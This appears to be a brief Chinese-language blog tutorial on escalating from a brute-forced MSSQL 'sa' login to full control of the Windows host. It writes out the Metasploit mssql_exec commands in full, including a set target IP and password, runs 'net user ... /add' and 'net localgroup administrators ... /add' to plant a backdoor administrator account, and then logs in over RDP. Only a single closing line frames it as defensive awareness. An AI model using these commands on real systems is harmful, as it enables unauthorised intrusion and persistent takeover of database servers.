看图片我们还是用到KALI 啊,前面一篇我们聊过了用爆破已经获取了MSSQL 的登录密码,那么,怎么样可以提权数据库底层的操作系统呢?
第一步:调用
mssql_exec 工具,这东西,大家可以百度一下,比较有意思的说show options 后培训必要的参数,这里的sa 密码是我们前面爆破出来的,填写进去
msf > use auxiliary/admin/mssql/mssql_exec 调用exec工具
set PASSWORD 12345678 :设置前期攻击爆出的密码
set cmd cmd.exe /c net user
set rhosts 10.10.100.139
set threads 10
set USERNAME sa
配置好后run运行
run
run 出来的效果是可以调用存储过程
第二步: 创建超级管理员攻击增加管理员
set cmd cmd.exe /c net user XXtest test@123/add&net localgroup administrators XXtest /add
run
第三步:调用RDP 工具去测试登录目标系统,
通过Linux rdesktop RDP 连接目标DB host
看截图,已经能够登录上目标系统了,而且是超级管理员,提权成功
熟知攻击套路,用心配置安全设备防护措施,希望对菜鸟有点点帮助,大神们跳过!